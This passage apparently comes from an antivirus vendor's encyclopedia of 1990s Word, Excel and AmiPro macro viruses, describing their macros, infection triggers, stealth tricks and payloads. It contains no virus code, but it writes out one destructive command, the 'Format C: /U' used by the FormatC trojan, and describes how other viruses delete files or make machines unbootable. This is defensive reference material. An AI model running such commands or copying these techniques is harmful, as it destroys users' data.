  15837. "   This school is really good.  NOT   "
  15838. "   We all love Mr. Hirst.   "
  15839. "   M.R.Beard   "
  15840. "   This network is REALLY fast.   "
  15841. "   Hi Sexy!   "
  15842. "   Who's been typing on my computer?   "
  15843. "   Well helloooo there!   "
  15844. "   Guess who?   "
  15845.  
  15846. [WORD_Goldfish]
  15847. Virus Name: WORD_Goldfish
  15848. Alias Name: Fishfood
  15849. Virus Type: Word macro virus
  15850. Virus Length: 1906 Bytes (2 Macros)
  15851. Symptoms: Display of windows
  15852. Place of origin: USA
  15853. Description: This virus infects MS Word documents.
  15854.  
  15855. Goldfish contains 2 encrypted (Execute-Only) macros
  15856. with a size of 1906 Bytes.
  15857.  
  15858. "AutoOpen"
  15859. "AutoClose"
  15860.  
  15861. When an infected document is opened, Goldfish will
  15862. infect the global template (NORMAL.DOT). Further documents
  15863. are infected when they are opened ("AutoOpen"). Infected
  15864. documents are converted internally into templates, which
  15865. is very common for macro viruses.
  15866.  
  15867. Goldfish is one of the very few non-destructive macro viruses.
  15868. It only infects other files and displays the following text window:
  15869.  
  15870. "I am the goldfish, I am hungry, feed me."
  15871.  
  15872. The message will not go away until the user types in an acceptable
  15873. response. The available answers are:
  15874.  
  15875. "fishfood", "worms", "worm", "pryme" and  "core".
  15876.  
  15877. [WORD_Friendly]
  15878. Virus name: WORD_Friendly:De
  15879. Number of macros: 20
  15880. Encrypted: No
  15881. Macro names: Abbrechen, AutoExec, AutoOpen, Cancel, DateiBeenden,
  15882.               DateiNeu, DateiOeffnen, DateiSchliessen, DateiSpeichern,
  15883.               DateiSpeichernUnter, ExtrasMacro, ExtrasMakro, Fast,
  15884.               FileExit, FileNew, FileOpen, FileSave, FileSaveAs,
  15885.               Infizieren, Talk
  15886. Size of macros: 9867 Bytes
  15887. Place of origin: Germany
  15888. Date of origin: May, 1996
  15889. Destructive: Yes
  15890. Common In-The-Wild: No
  15891. Description:
  15892.  
  15893. Friendly was an effort to write a virus for more than one
  15894. language, yet due to some wrong translations (ExtrasMacro
  15895. instead of ToolsMacro) Friendly does not work with other
  15896. versions than the German version of Microsoft Word.
  15897.  
  15898. Friendly tries to infect the global template (normal.dot) when
  15899. an infected document is opened. It checks the global template
  15900. for a previous infection by looking for the text "Friendly",
  15901. Author = Nightmare". After the macros have been transfered the
  15902. destructive payload is called from the "Fast" macro.
  15903.  
  15904. Friendly infects other documents whenever new ones are created,
  15905. an action is canceled, and whenever documents are opened, closed,
  15906. saved, or Exited from Word. Friendly does not check for a previous
  15907. document infection. It simply overwrites existing macros.
  15908.  
  15909. The destructive payload, inside the "Fast" macro, is called
  15910. when the system clock has a second value smaller than 2.
  15911. Friendly then creates a debug script inside the C:\DOS
  15912. directory and executes the the DOS DEBUG.EXE command. In
  15913. addition, Friendly adds an entry into AUTOEXEC.BAT, so the
  15914. DOS based virus is started after the next boot-up. The DOS
  15915. based virus inside Friendly has a size of 395 Bytes and is a
  15916. memory resident companion virus encrypted with CryptCOM.
  15917.  
  15918. Friendly displays the following message on January 1st:
  15919.  
  15920. "   Ein gutes neues Jahr !   "
  15921.  
  15922. and infects EXE files upon execution. COM files are created with the
  15923. same name and with the attributes "READ-ONLY" and "HIDDEN".
  15924.  
  15925. If the virus is active, the following text is displayed when people
  15926. try to look at the macro list:
  15927.  
  15928. "You can't do that!"
  15929. "I'm very anxious!"
  15930. "Hello my friend!"
  15931. "<< Friends >> Virus"
  15932.  
  15933. (translated:)
  15934.  
  15935. "Du kannst das nicht tun!"
  15936. "Ich bin sehr aengstlich!"
  15937. "Hallo mein Freund!"
  15938. "<< Friends >> Virus"
  15939.  
  15940. After May 1st Friendly displays the following text when infecting
  15941. documents for the first time (except for NORMAL.DOT).
  15942.  
  15943. "Hallo mein Freund!"
  15944. "Ich bin der << Friends >> Virus und wie heißt du?"
  15945. "Gib doch bitte anschließend unten deinen Namen ein:"
  15946. "Also ..... ich habe eine gute und eine schlechte Nachricht fuer dich!"
  15947. "Die schlechte Nachricht ist, daß ich mich auf deiner Platte eingenistet"
  15948. "habe und die gute ist, daß ich aber ein freundlicher und auch nuetzlicher
  15949. "Virus bin. Druecke bitte OK fuer Weiter!"
  15950.  
  15951. "Wenn du mich nicht killst, dann fuege ich ein Programm in deine"
  15952. "Autoexec.bat ein, daß deine lame Tastatur etwas auf Touren bringt."
  15953. "Also ...., gib dir einen Ruck und kill mich nicht. Goodbye!"
  15954.  
  15955. (translated:)
  15956.  
  15957. "Hello my Friend!"
  15958. "I'm the << Friends >> Virus and how are you?"
  15959. "Can you give me your name, please?"
  15960. "Hello .... I have a good and a bad message for you! The bad message is that"
  15961. "you have now a Virus on your Harddisk and the good message is that I'm
  15962. "harmless and useful. Press OK!"
  15963.  
  15964. "If you don't kill me, I will insert a programme in your AutoExec.bat thats
  15965. "your Keyboard accelerated. Please .... don't kill me. Goodbye!"
  15966.  
  15967. The entered name will then also be displayed.
  15968.  
  15969. [WORD_FMT.Trojan]
  15970. Virus name: WORD_FMT.Trojan (a.k.a. TrojanFormat)
  15971. Number of macros: 1
  15972. Encrypted: No
  15973. Macro names: AutoOpen
  15974. Size of macros: 81 Bytes
  15975. Place of origin: Posted to Usenet
  15976. Date of origin: Unknown
  15977. Destructive: Yes
  15978. Common In-The-Wild: No
  15979. Description:
  15980.  
  15981. FormatC is not a virus but a trojan horse, which does not replicate.
  15982.  
  15983. When an infected document is opened, the trojan triggers the destructive
  15984. payload, which types " Format C: /U " in a minimized DOS box and then
  15985. formats the C drive.
  15986.  
  15987. FormatC is very unlikely to spread since it does not infect
  15988. other files.
  15989.  
  15990. [WORD_Doggie]
  15991. Virus Name: WORD_Doggie
  15992. Alias Name: None
  15993. Virus Type: Word macro virus
  15994. Virus Length: 610 Bytes (3 Macros)
  15995. Symptoms: Display of windows
  15996. Place of origin: USA
  15997. Description: This virus infects MS Word documents.
  15998.  
  15999. Doggie contains 3 macros with a size of 610 Bytes.
  16000.  
  16001. "Doggie"
  16002. "AutoOpen"
  16003. "FileSaveAs"
  16004.  
  16005. Upon opening an infected document, Doggie will infect
  16006. the global template (NORMAL.DOT). Further
  16007. documents are infected with the "FileSaveAs" command.
  16008. Infected documents are converted internally to templates,
  16009. which is very common for macro viruses.
  16010.  
  16011. Doggie is one of the very few non-destructive macro viruses.
  16012. It only infects other files and displays the following
  16013. text window:
  16014.  
  16015. "Doggie "
  16016.  
  16017. Since Doggie uses English macro names ("FileSaveAs")
  16018. it will only work with the English version of Microsoft Word.
  16019.  
  16020.  
  16021. [WORD_WW2DEMO]
  16022. Virus Name: WORD_WW2Demo
  16023. Alias Name: WM.DMV
  16024. Virus Type: Word macro virus
  16025. Virus Length: 3002 Bytes (1 Macro)
  16026. Symptoms: Display of messages
  16027. Place of origin: United States, also posted in Usenet
  16028. Description: This virus infects MS Word documents.
  16029.  
  16030. Demonstration contains 1 macro with a size of 3002 Bytes.
  16031.  
  16032. "AutoClose"
  16033.  
  16034. Demonstration was the first macro virus written by
  16035. Joel McNamara, who published a detailed paper about
  16036. macro viruses. It is believed that DMV invited additional
  16037. virus authors to write Word macro viruses. While the paper
  16038. was not published until Concept was discovered, it helped
  16039. virus authors to use new techniques.
  16040.  
  16041. Joel McNamara also published an Excel macro virus,
  16042. which is non functional.
  16043.  
  16044. When an infected document is closed, DMV infects the
  16045. global template (NORMAL.DOT). Further documents
  16046. are infected when they are closed. They are also converted
  16047. internally to templates, which is very common for macro
  16048. viruses.
  16049.  
  16050. Upon infection, Demonstration displays the following
  16051. text strings on the screen:
  16052.  
  16053. " Counting global macros"
  16054. "AutoClose macro virus is already installed in
  16055. NORMAL.DOT."
  16056. "Infected NORMAL.DOT with a copy of AutoClose
  16057. macro virus. "
  16058. "AutoClose macro virus already present in this document."
  16059. "Saved current document as template."
  16060. "Infected current document with copy of AutoClose
  16061. macro virus."
  16062. " Macro virus has been spread. Now execute some other code
  16063. (good, bad, or indifferent)."
  16064.  
  16065.  
  16066. [WORD_Divina]
  16067. Virus Name: WORD_Divina
  16068. Alias Name: Roberta
  16069. Virus Type: Word macro virus
  16070. Virus Length: 2357 Bytes (1 Macro)
  16071. Symptoms: Beeps and pauses during display of messages,
  16072.           Display of text windows
  16073. Place of origin: Italy
  16074. Description: This virus infects MS Word documents.
  16075.  
  16076. Divina was probably written by the author of the Date
  16077. macro virus, and is widespread in Malta, Spain and Italy.
  16078. Divina contains only one encrypted (Execute-Only)
  16079. macro with a size of 2357 Bytes.
  16080.  
  16081. "AutoClose"
  16082.  
  16083. Divina infects the global template (NORMAL.DOT) when
  16084. an infected document is opened and then closed. Further
  16085. documents are infected when they are closed via the
  16086. "AutoClose" command.
  16087.  
  16088. Divina has two payloads. The first payload checks the
  16089. system time, and in case of a value of 17 in the minutes
  16090. field, it will display a set of windows. Between each
  16091. displayed box it will pause and beep.
  16092. The following boxes are displayed:
  16093.  
  16094. "ROBERTA TI AMO!"
  16095.  
  16096. "Virus 'ROBERTA' is running. Hard Disk damaged.
  16097. Start antivirus?"
  16098.  
  16099. "Exit from system and low level format are recommended."
  16100.  
  16101. "Exit from System?"
  16102.  
  16103. After the last message Divina tries to exit Windows.
  16104.  
  16105. The second payload is activated on May 21. Divina will
  16106. again check the system clock, and if a document is being
  16107. closed between the 10th and 20th or between the 40th and
  16108. 50th minute, it will display another 2 windows.
  16109.  
  16110. "DIVINA IS THE BEST!"
  16111.  
  16112. followed by another window with an Italian message.
  16113. Divina does not contain any destructive payloads. The
  16114. only problem with Divina is that it might panic users
  16115. into low-level formatting their hard drives.
  16116.  
  16117.  
  16118. [WORD_Date]
  16119. Virus Name: WORD_Date
  16120. Alias Name: AntiDMV, Infezione
  16121. Virus Type: Word macro virus
  16122. Virus Length: 1042 Bytes (1 Macro)
  16123. Symptoms: Removal of AutoClose macro from documents
  16124. Place of origin: United States
  16125. Description: This virus infects MS Word documents.
  16126.  
  16127. Date was probably written by the author of the Divina
  16128. macro virus.  It contains only one encrypted
  16129. (Execute-Only) macro, with a size of 1042 Bytes.
  16130.  
  16131. "AutoOpen"
  16132.  
  16133. When an infected document is opened, Date infects the
  16134. global template (NORMAL.DOT). Further documents are
  16135. infected when they are opened.  Infection occurs only
  16136. until June 1, 1996. By the time you read this document,
  16137. Date should not be a threat anymore even though infected
  16138. documents might still be around.
  16139.  
  16140. Date is also known under the name AntiDMV. This
  16141. name was chosen because it removes the "AutoClose"
  16142. macro from documents. The macro virus "DMV",
  16143. which has only one "AutoClose" macro, can therefore
  16144. be removed with the Date virus.
  16145.  
  16146.  
  16147. [WORD_CONCEPT-G]
  16148. Virus Name: Word_Concept.G
  16149. Alias Name: Parasite, Parasite 0.8, P-Site
  16150. Virus Type: Word macro virus
  16151. Virus Length: 3670 Bytes (7 Macros) in .doc files
  16152.             3450 Bytes (7 Macros) in global templates
  16153. Symptoms: Display of Windows
  16154.           Modified documents
  16155. Place of origin: United States
  16156. Description: This virus infects MS Word documents.
  16157.  
  16158. Concept.G contains 7 encrypted (Execute-Only) macros
  16159. with a size of 3670 Bytes.
  16160.  
  16161. "K"
  16162. "A678"
  16163. "Para"
  16164. "Site"
  16165. "I8U9Y13"
  16166. "Paylaod"
  16167. "AutoOpen"
  16168.  
  16169. Concept.G is activated when an infected document is
  16170. opened (AutoOpen).  Upon activation, Concept.G
  16171. infects the global template (NORMAL.DOT).
  16172. Infected documents are converted internally to templates,
  16173. which is very common for macro viruses.
  16174.  
  16175. Concept.G has various payloads. The first replaces the
  16176. following words in infected documents:
  16177.  
  16178. "and" with "not"
  16179.  
  16180. The second payload is a little bit more comprehensive.
  16181. Concept.G checks the system time for a specific value
  16182. in the days section. In case of a 16 (every 16th of the
  16183. month) it activates its payloads. It then replaces the
  16184. following letters/word in infected documents:
  16185.  
  16186. "." (dot) with "," (comma)
  16187. "and" with "not"
  16188. "a" with an "e"
  16189.  
  16190. According to the Concept.G virus code, it is a beta release.
  16191. Instead of version 1.0 (Concept.F) it is version 0.8.
  16192.  
  16193. [WORD_Concept]
  16194. Virus name: WORD_Concept (a.k.a Prank, WW6Macro, Winword, WBMV)
  16195. Number of macros: 4
  16196. Encrypted: No
  16197. Macro names: AutoOpen, AAAZAO, AAAZFS (FileSaveAs), Payload
  16198. Size of macros: 1968 Bytes
  16199. Place of origin: USA
  16200. Date of origin: July, 1995
  16201. Destructive: No
  16202. Common In-The-Wild: Yes
  16203. Description:
  16204.  
  16205. Concept was the first macro virus found "In-the-Wild". It was discovered
  16206. in July-August 1995 and is now the most common virus.
  16207.  
  16208. Concept activates when an infected document is opened (AutoOpen).
  16209. Upon activation, Concept checks for a previous infection of the global
  16210. template (normal.dot). If none of the macros are present, Concept copies
  16211. its virus macros. The "AAAZFS" macro is saved under the name "FileSaveAs".
  16212.  
  16213. After infecting the global template, Concept makes an entry in the
  16214. Win.ini file. It sets "WW6I=1" and displays a window with a "1" in it.
  16215.  
  16216. Concept does not contain any destructive payload, even though is has
  16217. a macro with the name "Payload". The "Payload" macro is empty except for
  16218. the following text:
  16219.  
  16220. "   That's enough to prove my point   "
  16221.  
  16222. [WORD_Colors]
  16223. Virus name: WORD_Colors (a.k.a Rainbow)
  16224. Number of macros: 9
  16225. Encrypted: Yes
  16226. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  16227.               FileSave, FileSaveAs, macros, ToolsMacro
  16228. Size of macros: 6470 Bytes
  16229. Place of origin: Portugal
  16230. Date of origin: Posted to Usenet on October, 1995
  16231. Payload: Yes
  16232. Common In-The-Wild: Yes
  16233. Description:
  16234.  
  16235. Colors is the first macro virus that can still infect, even
  16236. when all the Auto-macros are turned off. It also uses
  16237. "ToolsMacro" to make recognition of an infected file more difficult
  16238. (called macro stealth technique).
  16239.  
  16240. Upon activation of one of its macros (all except for AutoExec),
  16241. Colors tries to infect the global template (normal.dot).
  16242. It checks if all its macros are already present in the global template
  16243. and if this is not the case, it transfers the virus macros or replaces
  16244. already existing ones.
  16245.  
  16246. The global template becomes infected when a document is opened,
  16247. saved, closed or Microsoft Word is exited. Further documents become
  16248. infected when a file is created (FileNew) or saved (FileSave, FileSaveAs).
  16249.  
  16250. The destructive payload is located in the "macros" macro. Once activated
  16251. Colors creates a variable in the [Windows] section of Win.ini with the
  16252. name "countersu", which counts upwards from zero. After each 300th call,
  16253. Colors changes the color palette of 21 Windows desktop elements.
  16254. Background, buttons and borders will have new randomly selected colors,
  16255. which will leave the user with a sometimes unusual looking desktop.
  16256.  
  16257. [WINWORD_COLORS.D]
  16258. Virus Name: WinWORD_Colors.D
  16259. Alias Name: Colo-d, WM.Colors
  16260. Virus Type: Word macro virus
  16261. Virus Length: 19688 Bytes (9 Macros)
  16262. Symptoms: Display of error messages
  16263. Place of origin: Unknown
  16264. Description: This virus infects MS Word documents.
  16265.  
  16266. Colors.D is a macro virus including 9 encrypted
  16267. (Execute-Only) macros:
  16268.  
  16269. "AutoClose"
  16270. "AutoExec"
  16271. "AutoOpen"
  16272. "FileExit"
  16273. "FileNew"
  16274. "FileSave"
  16275. "FileSaveAs"
  16276. "macros"
  16277. "ToolsMacros"
  16278.  
  16279. Colors.D seems to be a combination of the previously found
  16280. Colors.A virus and the Microsoft macro virus solution
  16281. "Scanprot." It is not recommended to use the Tools/Macro
  16282. command to look for the macros from Colors.B. The virus
  16283. will execute when trying to do so. Instead, use the
  16284. File/Templates/Organizer/Macros command to detect
  16285. and delete the offending macros.
  16286.  
  16287. Even though Colors.D has an anti-virus solution part
  16288. in its code, it is still able to spread and infect the global
  16289. template (NORMAL.DOT) and new documents.
  16290.  
  16291. Colors.D displays the following error message:
  16292.  
  16293. "Unknown Command, Subroutine, or Function"
  16294.  
  16295.  
  16296. [WORD_CLOCK]
  16297. Virus Name: Word_Clock
  16298. Alias Name: Clock:De, WM.Extra
  16299. Virus Type: Word macro virus
  16300. Virus Length: 3795 Bytes (11 Macros)
  16301. Symptoms: Display of windows
  16302. Place of origin: USA
  16303. Description: This virus infects MS Word documents.
  16304.  
  16305. Clock contains eleven encrypted (Execute-Only) macros
  16306. with a size of 3795 Bytes.
  16307.  
  16308. "Action"
  16309. "Oeffnen"
  16310. "AutoExec"
  16311. "AutoOpen"
  16312. "Speichern"
  16313. "Extrasmakro"
  16314. "DateiSchliessen"
  16315. "Datumunduhrzeit"
  16316. "Dateidokvorlagen"
  16317. "Dateiallesspeichern"
  16318.  
  16319. Clock uses macro stealth techniques to hide itself. It uses
  16320. "ExtrasMakro" ("ToolsMacro") and "DateiDokVorlagen"
  16321. ("File Templates") to make recognition of an infected
  16322. document more difficult.
  16323.  
  16324. When an infected document is opened, Clock
  16325. infects the global template (NORMAL.DOT). To hide
  16326. the infection it turns off the prompting of Word before
  16327. saving a modified global template. Infected
  16328. documents are converted internally into templates,
  16329. which is very common for macro viruses.
  16330.  
  16331. When an infected document is opened after the
  16332. 26th of each month, Clock will display a window
  16333. containing the time. It will also activate one of
  16334. its destructive payloads, which is to set the system
  16335. clock to a value of 33 in the seconds field. Clock
  16336. does this every 2 to 3 minutes, which results
  16337. in a less accurate system clock.
  16338.  
  16339. The second payload will start in 1997. Clock will
  16340. check the system clock, and in case of a minute
  16341. value smaller than 5, it will flip the "FileOpen"
  16342. and "FileSave" macros.
  16343.  
  16344. This will only happen on the following days
  16345. during the month:
  16346.  
  16347. 1st
  16348. 2nd
  16349. 13th
  16350. 21st
  16351. 27th.
  16352.  
  16353. Since Clock uses German macro names, it will only
  16354. work with the German version of Microsoft Word.
  16355.  
  16356.  
  16357. [WORD_BueroNeu]
  16358. Virus Name: Word_BueroNeu
  16359. Alias Name: Buero:De, BuroNeu, Bureau
  16360. Virus Type: Word macro virus
  16361. Virus Length: 697 Bytes (2 Macros)
  16362. Symptoms: Files deleted
  16363.           Files renamed
  16364. Place of origin: Germany
  16365. Description: This virus infects MS Word documents.
  16366.  
  16367. Buero contains two encrypted (Execute-Only) macros
  16368. with a size of 697 Bytes.
  16369.  
  16370. "AutoOpen"
  16371. "BueroNeu"
  16372.  
  16373. When an infected document is opened, Buero infects the
  16374. global template (NORMAL.DOT). The global template
  16375. includes the "DateiSpeichern" macro instead of
  16376. "AutOpen." Further documents are infected with the
  16377. "DateiSpeichern" ("FileSave") command. Infected documents
  16378. are converted internally into templates, which is very
  16379. common for macro viruses.
  16380.  
  16381. Upon infection Buero activates its destructive payloads.
  16382. After August 15, 1996, Buero renames the system file
  16383. "IO.SYS" to "IIO.SYS." This action will leave the computer
  16384. unbootable. The second destructive payload searches for
  16385. C:\*.DOC files and deletes them.
  16386.  
  16387. Since Buero uses German macro names ("DateiSpeichern"),
  16388. it will only work with the German version of Microsoft Word.
  16389.  
  16390.  
  16391. [WORD_Boom]
  16392. Virus name: WORD_Boom:De (a.k.a. Boombastic)
  16393. Number of macros: 4
  16394. Encrypted: Yes
  16395. Macro names: AutoExec, AutoOpen, DateiSpeichernUnter, System
  16396. Size of macros: 2863 Bytes
  16397. Place of origin: Germany
  16398. Date of origin: July, 1996
  16399. Payload: Yes
  16400. Common In-The-Wild: Yes
  16401. Description:
  16402.  
  16403. Boom is the second macro virus written for the German version of
  16404. Microsoft WORD_
  16405.  
  16406. Boom's destructive payload renames the menu structure of Word to:
  16407.  
  16408. Datei       ->    Mr.Boombastic
  16409. Bearbeiten  ->    and
  16410. Ansicht     ->    Sir WIXALOT
  16411. Einfuegen   ->    are
  16412. Format      ->    watching
  16413. Extras      ->    you
  16414. Tabelle     ->    !
  16415. Fenster     ->    !
  16416. Hilfe       ->    !
  16417.  
  16418. A sound is send to the PC speaker during the renaming process.
  16419. After the menu change, Boom will create a new global template and
  16420. insert the following text:
  16421.  
  16422. "   Greetings from Mr. Boombastic and Sir WIXALOT !!!   "
  16423.  
  16424. "   Oskar L., wir kriegen dich!!!   "
  16425.  
  16426. "Dies ist eine Initiative des Institutes zur Vermeidung und Verbreitung von "
  16427. "  Peinlichkeiten, durch in der Oeffentlichkeit stehende Personen, unter der   "
  16428. "                         Schirmherrschaft von Rudi S. !                    "
  16429.  
  16430. This text will be printed by Boom.
  16431.  
  16432. [WORD_Bandung]
  16433. Virus Name: WORD_Bandung
  16434. Alias Name: None
  16435. Virus Type: Word macro virus
  16436. Virus Length: 4262 Bytes (6 Macros)
  16437. Symptoms: Display of windows
  16438.           Creation of new files
  16439. Place of origin: Bandung, Indonesia
  16440. Description: This virus infects MS Word documents.
  16441.  
  16442. Bandung contains 6 macros with a size of 4262 Bytes.
  16443.  
  16444. "AutoExec"
  16445. "AutoOpen"
  16446. "FileSave"
  16447. "FileSaveAs"
  16448. "Toolsmacro"
  16449. "Toolscustomize"
  16450.  
  16451. When an infected document is opened, Bandung infects the
  16452. global template (NORMAL.DOT). Further documents are
  16453. infected with the "FileSave" and "FileSaveAs" commands.
  16454. Infected documents are converted internally into templates,
  16455. which is very common for macro viruses.
  16456.  
  16457. Bandung also uses macro stealth techniques to hide itself.
  16458. It uses "ToolsMacro" to make recognition of an infected
  16459. document more difficult.
  16460.  
  16461. Upon infection Bandung activates its destructive payloads.
  16462.  
  16463. It creates the file C:\PESAN.TXT with following message:
  16464.  
  16465. "Anda rupanya sedang sial, semua file di mesin ini kecuali
  16466. yang berada  "
  16467. "di direktori WINDOWS dan WINWORD telah hilang,
  16468. jangan kaget, ini bukan " "ulah Anda, tapi ini hasil
  16469. pekerjaan saya...Barang siapa yang berhasil  "
  16470. "    menemukan cara menangkal virus ini, saya aka" +
  16471. "n memberi listing"
  16472. "virus ini untuk Anda !!! Dan tentu saja saya akan terus
  16473. datang kesini"
  16474. " untuk memberi Anda salam dengan virus-virus terbaru
  16475. dari saya...selamat ! "
  16476. " Bandung, Selasa,"
  16477.  
  16478. Following the message is the current Day, Month,
  16479. Year, Date and Time.
  16480.  
  16481. Example:           29 Agustus 1996, Jam: 18:09
  16482.  
  16483. Bandung also displays the following error messages:
  16484.  
  16485. "                           Fail on step 29296                     "
  16486. and
  16487.  
  16488. "No such macro or command"
  16489.  
  16490. [WORD_Atom]
  16491. Virus name: WORD_Atom (a.k.a. Atomic)
  16492. Number of macros: 4
  16493. Encrypted: Yes
  16494. Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
  16495. Size of macros: 1029 Bytes
  16496. Place of origin: Ukraine
  16497. Date of origin: February, 1996
  16498. Destructive: Yes
  16499. Common In-The-Wild: Yes
  16500. Description:
  16501.  
  16502. Atom infects the global template (Normal.dot) once an infected
  16503. document is opened. Further documents become infected when a
  16504. document is opened (FileOpen) or saved (FileSaveAs).
  16505.  
  16506. When the "FileSaveAs" macro is called, Atom checks the system
  16507. clock for a value of 13 in the seconds field. If this is the case,
  16508. Atom adds the password "ATOM#1" to the saved document.
  16509.  
  16510. The destructive payload inside the "Atom" is activated on the
  16511. 13th of each month. On this day,  Atom deletes all the files
  16512. inside the current directory.
  16513.  
  16514. [EXCEL_Laroux.A]
  16515. Virus name: EXCEL_Laroux.A
  16516. Virus Type: Macro virus
  16517. Number of modules: 1
  16518. Module Name: laroux
  16519. Sub-Routines: Auto_Open, Check_Files
  16520. Place of origin: USA
  16521. Date of origin: 1996
  16522. Payload: No
  16523. Seen In-The-Wild: Yes
  16524. Description: Laroux is the first macro virus written
  16525.              for Microsoft Excel.
  16526.  
  16527. When an infected file is opened (Auto_Open), the "Check_
  16528. files" macro is called (from the Auto_Open macro) and
  16529. PERSONAL.XLS (similar to Word's NORMAL.DOT) becomes
  16530. infected.  Further files become infected when they are
  16531. activated (OnSheetActivate).
  16532.  
  16533. The following sections of the "File Properties" section are
  16534. cleared by Laroux:
  16535.  
  16536. Title
  16537. Subject
  16538. Author
  16539. Keywords
  16540. Comments
  16541.  
  16542. Laroux is not destructive and its macro (laroux) is not hidden
  16543. from the user. It can be located with Word's Tools/Macro
  16544. option.
  16545.  
  16546.  
  16547. [EXCEL_Robocop]
  16548. Virus name: EXCEL_Robocop
  16549. Virus Type: Macro virus
  16550. Number of modules: 2
  16551. Module Name: ROBO, COP
  16552. Sub-Routines: Auto_Open
  16553. Place of origin: Germany
  16554. Date of origin: Unknown
  16555. Payload: Yes
  16556. Seen In-The-Wild: No
  16557. Description: Robocop is another Excel macro virus that was
  16558.              published over the Internet.
  16559.  
  16560. When an infected file is opened (Auto_Open called by ROBO),
  16561. the PERSONAL.XLS becomes infected. Further files become
  16562. infected when they are activated (SheetActivate).
  16563.  
  16564. On March 1st of each year, Robocop inserts the following text
  16565. into the active sheet:
  16566.  
  16567. "   ROBOCOP Nightmare Joker [SLAM]   "
  16568.  
  16569.  
  16570. [EXCEL_Sofa (a.k.a. MicroSofa)]
  16571. Virus name: EXCEL_Sofa (a.k.a. MicroSofa)
  16572. Virus Type: Macro virus
  16573. Number of modules: 1
  16574. Module Name: (11 spaces)
  16575. Sub-Routines: Auto_Open, Auto_Range, Auto_Close,
  16576.                Current_Open
  16577. Place of origin: USA
  16578. Date of origin: Unknown
  16579. Destructive: No
  16580. Seen In-The-Wild: No
  16581. Description: Sofa was the second working Excel macro virus
  16582.              (after Laroux).
  16583.  
  16584. When an infected file is opened, the "Microsoft Excel" title is
  16585. changed to "Microsofa Excel" and the infection routine is
  16586. called upon.
  16587.  
  16588. First, Sofa looks for the BOOK.XLT file and if it can not find
  16589. the file, the system is not yet infected, it will display the
  16590. following message:
  16591.  
  16592. "   Microsoft Excel has detected a corrupted add-in file   "
  16593. "   Click OK to repair this file   "
  16594.  
  16595. Sofa then creates the infected file and displays:
  16596.  
  16597. "   File successfully repaired!   "
  16598.  
  16599. Upon starting Excel the next time, the infected BOOK.XLT file
  16600. is loaded into the system and all further files will become
  16601. infected.
  16602.  
  16603.  
  16604. [EXCEL_Legend]
  16605. Virus name: EXCEL_Legend
  16606. Virus Type: Macro virus
  16607. Number of modules: 1
  16608. Module Name: Legend
  16609. Sub-Routines: Auto_Open, Infect
  16610. Place of origin: USA
  16611. Date of origin: Unknown
  16612. Destructive: No
  16613. Seen In-The-Wild: No
  16614. Description: Legend is another Excel macro virus that was published
  16615.              over the Internet.
  16616.  
  16617. When an infected file is opened, "Auto_Open" sets the
  16618. sub-routine "Infect" as a SheetActivate handler. As a result all
  16619. activated sheets will call the "Infect" sub-routine and
  16620. PERSONAL.XLS or the active sheet will become infected.
  16621.  
  16622. To make recognition of an infection more difficult, Legend
  16623. removes the Tools/Macro option (called macro stealth
  16624. technique).
  16625.  
  16626. Legend will not infect any files if the user name is "   Pyro   "
  16627. and the name of the organization is: "   VBB   ".
  16628.  
  16629. The following message is displayed by Legend:
  16630.  
  16631. "   Pyro [VBB]   "
  16632. "   You've Been Infected By Legend!   "
  16633.  
  16634.  
  16635. [Lotus.Green_Stripe]
  16636. Virus name: Lotus.Green_Stripe
  16637. Virus Type: Word macro virus
  16638. Size: 6256 Bytes
  16639. Place of origin: USA
  16640. Date of origin: 1996
  16641. Payload: Yes
  16642. Seen In-The-Wild: No
  16643. Description:
  16644.  
  16645. Green_Stripe is the first demonstration virus written for Lotus
  16646. AmiPro.  While macro viruses for Microsoft Word spread very
  16647. quick, Green_Stripe is very unlikely to get in the wild.
  16648. AmiPro keeps its macro file separate from the document and
  16649. therefore it will not spread very far. To ensure infection of
  16650. both files, the document and the macro have to be transmitted.
  16651. This is very unlikely to happen when a user sends an infected
  16652. file via e-mail.
  16653.  
  16654. When an infected file is opened, the macro (*.smm) is
  16655. activated. At this point Green_Stripe goes through the
  16656. document directory and tries to open and infect each file
  16657. (.sam). The user will experience files being opened and closed
  16658. very quickly which should alert the user. Green_Stripe creates an
  16659. error message when it tries to open an already opened file.
  16660. New infected macro files are saved with the extension .smm
  16661. and are hidden.
  16662.  
  16663. Further documents become infected when they are saved with
  16664. the "Save" or "SaveAs" option. Another alert for the user
  16665. should be the "SaveAs" box, which looks different compared
  16666. to the original one. The new box has the following title:
  16667.  
  16668. "   Macro Get String   "
  16669.  
  16670. GreenStripe activates its destructive payload when an infected
  16671. file is saved. It will replace the word "its" with "it is". This part
  16672. of the virus does not always work.
  16673.  
  16674.  
  16675. [WORD_Alliance]
  16676. Virus name: WORD_Alliance
  16677. Virus Type: Word macro virus
  16678. Number of macros: 1
  16679. Encrypted: No
  16680. Macro names: AutoOpen
  16681. Size of macros: 352 Bytes
  16682. Place of origin: USA
  16683. Date of origin: Summer 1996
  16684. Destructive: No
  16685. Common In-The-Wild: No
  16686. Description:
  16687.  
  16688. Upon opening an infected document, Alliance will infect the
  16689. global template (NORMAL.DOT). Further documents become
  16690. infected when they are opened ("AutoOpen").
  16691.  
  16692. Alliance is only infectious on the:
  16693.  
  16694. 2nd day of each month.
  16695. 7th day of each month.
  16696. 11th day of each month.
  16697. 12th day of each month.
  16698.  
  16699. Alliance adds the following comment to the File/Properties
  16700. section:
  16701.  
  16702. "   You have been infected by the Alliance   "
  16703.  
  16704.  
  16705. [WORD_Alien.A]
  16706. Virus name: WORD_Alien.A
  16707. Virus Type: Word macro virus
  16708. Number of macros: 3
  16709. Encrypted: Yes
  16710. Macro names: AutoOpen, AutoClose, FileSaveAs
  16711. Size of macros: 7037 Bytes
  16712. Place of origin: India
  16713. Date of origin: November 1996
  16714. Payload: Yes
  16715. Seen In-The-Wild: No
  16716. Description:
  16717.  
  16718. Alien infects the global template (normal.dot) when an infected
  16719. document is opened. Further documents become infected when
  16720. they are opened or closed.
  16721.  
  16722. Before infection Alien checks for the string "Alien." If already
  16723. present, Alien does not infect.
  16724.  
  16725. The "ToolsCustomize" and "ToolsMacro" options are removed
  16726. by Alien to make recognition of an infected file more difficult
  16727. (called macro stealth technique).
  16728.  
  16729. With a probability of 50 percent Alien displays the following
  16730. message, on August 1st, and hides the "program manager" in
  16731. Windows 3.x:
  16732.  
  16733. "   Another Year of Survival   "
  16734.  
  16735. Users are then unable to shut down Windows.
  16736.  
